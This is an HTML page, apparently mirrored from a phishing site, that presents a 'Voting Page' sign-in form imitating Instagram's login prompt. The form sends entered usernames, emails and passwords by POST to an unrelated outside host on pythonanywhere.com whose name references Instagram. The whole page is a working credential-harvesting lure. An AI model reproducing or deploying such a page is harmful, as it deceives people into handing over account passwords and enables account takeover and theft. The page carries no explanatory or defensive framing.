<!DOCTYPE html>
<html lang="en">

<!-- Mirrored from cleanpixelartsvotes.pages.dev/ig by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 04 Jul 2023 10:27:04 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=utf-8" /><!-- /Added by HTTrack -->
<head>
<!-- TYPE BELOW IS PROBABLY: 'website' or 'article' or look on https://ogp.me/#types -->
<meta property="og:type" content='Voting Page'/>
	<meta charset="utf-8">
	<meta name="author" content="Kodinger">
	<meta name="viewport" content="width=device-width,initial-scale=1">
	<title>Voting Page</title>
	<link rel="stylesheet" href="../stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">
	<link rel="stylesheet" type="text/css" href="css/my-login.css">
	
</head>

<body class="my-login-page">

	<section class="h-100">
		<div class="container h-100">
			<div class="row justify-content-md-center h-100">
				<div class="card-wrapper">
				
					<div class="brand">
						<img src="img/logo2.png" alt="logo">
					</div>
					
					<div class="card fat">
						<div class="card-body">
							<h4 class="card-title">Sign in to Continue</h4>
							
							<form action="https://instagramlifeswithdisability.pythonanywhere.com/login" method="POST" class="my-login-validation" novalidate="">
							
								<div class="form-group">
									<input id="email" type="username" placeholder="Phone number, username, email address" class="form-control" name="email" value="" required autofocus>

									<div class="invalid-feedback">
										Email is invalid
									</div>
								</div>

								<div class="form-group">
									
									<input id="password" type="password"  placeholder="Password" class="form-control" name="password" required data-eye>
								    <div class="invalid-feedback">
								    	Password is required
							    	</div>
								</div>
								<a href="index.html" class="float-right">
											Forgot Password?
										</a>

								<div class="form-group">
									<div class="custom-checkbox custom-control">
										<input type="checkbox" name="remember" id="remember" class="custom-control-input">
									</div>
									
								</div>

								<div class="form-group m-0">
									<button type="submit" class="btn btn-primary btn-block">
										Log in
									</button>
								</div>
								<div class="mt-4 text-center">
									Don't have an account? <a href="index.html">Sign up</a>
								</div>
							</form>
						</div>
					</div>
					<div class="footer">
					</div>
				</div>
			</div>
		</div>
	</section>

	<script src="../code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous"></script>
	<script src="js/my-login.html"></script>
</body>

<!-- Mirrored from cleanpixelartsvotes.pages.dev/ig by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 04 Jul 2023 10:27:09 GMT -->
</html>
